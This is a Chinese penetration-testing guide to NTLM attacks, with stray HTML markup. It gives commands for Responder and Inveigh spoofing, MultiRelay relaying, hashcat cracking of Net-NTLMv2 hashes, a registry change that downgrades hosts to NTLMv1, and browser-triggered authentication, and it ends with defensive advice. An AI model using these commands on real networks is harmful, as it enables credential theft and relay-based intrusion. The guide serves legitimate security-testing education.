NTLM认证相关攻击技巧全面指南<\/h1>

0x00 NTLM认证攻击简介<\/h2>

NTLM协议是Windows两大认证协议之一，攻击方法主要分为两类：<\/p>

SMB欺骗<\/strong>：通过监听网络流量获取NTLM认证凭证<\/li>

中继攻击<\/strong>：将获取的认证凭证转发到其他目标进行利用<\/li> <\/ol>
0x01 前置知识学习<\/h2>
(1) NTLM认证过程与NET-NTLM v1\v2<\/h3>
NTLM认证采用质询\/应答(Challenge\/Response)模式，流程如下：<\/p>

客户端发送包含明文用户名的请求<\/li>
服务器生成16位随机Challenge并返回<\/li>
客户端使用密码hash加密Challenge生成Response<\/li>
服务器验证Response<\/li> <\/ol>
认证协议版本<\/strong>：<\/p>

NTLM v1：Windows 2000\/XP使用<\/li>
NTLM v2：Windows Vista\/2008及以上默认使用<\/li>
NTLM session v2<\/li> <\/ul>
触发NTLM认证的常用命令<\/strong>：<\/p>
net.exe use \\<\/span>host\s<\/span>hare <\/span><\/span>attrib.exe \\<\/span>host\s<\/span>hare <\/span><\/span>cacls.exe \\<\/span>host\s<\/span>hare <\/span><\/span>certreq.exe \\<\/span>host\s<\/span>hare <\/span><\/span><\/code><\/pre>(2) LLMNR协议和NetBIOS协议<\/h3> LLMNR协议<\/strong>：<\/p> 当DNS解析失败时使用<\/li> 通过UDP向局域网发送多播查询<\/li> 默认启用<\/li> <\/ul> NetBIOS协议<\/strong>：<\/p> 提供OSI会话层服务<\/li> 默认随TCP\/IP协议安装<\/li> 主要用于局域网内计算机互访<\/li> <\/ul> Windows名称解析顺序<\/strong>：<\/p> hosts文件<\/li> DNS缓存\/服务器<\/li> LLMNR和NetBIOS<\/li> <\/ol> (3) SMB认证过程<\/h3> SMB协议<\/strong>：<\/p> 用于计算机间共享文件、打印机等<\/li> 基于TCP-NETBIOS，端口139\/445<\/li> 认证协议演变：LM → NTLM → Kerberos<\/li> <\/ul> SMB工作原理<\/strong>：<\/p> 客户端发送支持的SMB版本列表<\/li> 服务器选择版本<\/li> 客户端发起用户\/共享认证<\/li> <\/ol> 0x02 常规工具流程使用<\/h2> 1. SMB欺骗获取凭证<\/h3> 工具<\/strong>：Responder (v3.0.2.0 + py3.7.3 + Kali)<\/p> 工作组环境<\/strong>：<\/p> python3 Responder.py -I eth0 <\/span><\/span># 目标机器执行<\/span> <\/span><\/span>net use \\<\/span>asdasdasd <\/span><\/span><\/code><\/pre>域环境<\/strong>：同样方法可获取域用户凭证<\/p> 2. NTLM中继攻击<\/h3> 前提条件<\/strong>：<\/p> 目标未开启SMB签名（域控默认开启）<\/li> 工作组：需要sid 500用户hash且密码相同<\/li> 域环境：需要域管理员组成员<\/li> <\/ul> 工具<\/strong>：MultiRelay.py<\/p> 中继前信息搜集<\/strong>：使用RunFinger.py或NMAP检查SMB签名状态<\/p> 工作组中继<\/strong>：<\/p> 修改Responder.conf相关参数为OFF<\/li> 使用MultiRelay.py监听<\/li> 诱使目标访问不存在共享<\/li> <\/ol> 域中继<\/strong>：可中继域控或域管理员组成员的NET-NTLM Hash<\/p> 0x03 手工获取NET NTLM Hash与破解<\/h2> NTLMv2 Hash格式<\/h3> username::domain:challenge:HMAC-MD5:blob <\/code><\/pre> 破解命令<\/strong>：<\/p> hashcat -m 5600<\/span> <hash> password.list -o found.txt --force <\/span><\/span><\/code><\/pre>NTLMv1 Hash破解<\/h3> 可使用在线服务https:\/\/crack.sh\/get-cracking\/<\/p> 0x04 Windows版本工具<\/h2> 1. Responder.exe<\/h3> 适用于Windows平台<\/p> 2. Inveigh<\/h3> PowerShell版本<\/strong>：<\/p> Import-Module .\Inveigh.psd1 <\/span><\/span>Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y <\/span><\/span><\/code><\/pre>C#版本<\/strong>：需要.NET 3.5环境<\/p> 0x05 NTLM其他玩法<\/h2> 1. NTLM v1还原NTLM hash<\/h3> 适用于旧系统(如2003)<\/p> 2. 将系统降级为v1<\/h3> reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ \/v lmcompatibilitylevel \/t REG_DWORD \/d 0 \/f <\/span><\/span><\/code><\/pre>3. 使用InternalMonologue获取凭证<\/h3> 无需网络监听，直接获取本地用户凭证<\/p> 4. 浏览器欺骗<\/h3> IE\/Edge可通过img标签触发NTLM认证<\/p> 防御建议<\/h2> 禁用LLMNR和NetBIOS<\/li> 启用SMB签名<\/li> 限制NTLM使用，优先使用Kerberos<\/li> 监控异常NTLM认证请求<\/li> 使用强密码策略防止hash破解<\/li> <\/ol> 总结<\/h2> NTLM协议攻击是内网渗透中的重要技术，理解其认证流程和协议交互是成功利用的关键。通过本文介绍的各种技术，安全测试人员可以全面评估网络中的NTLM相关风险。<\/p>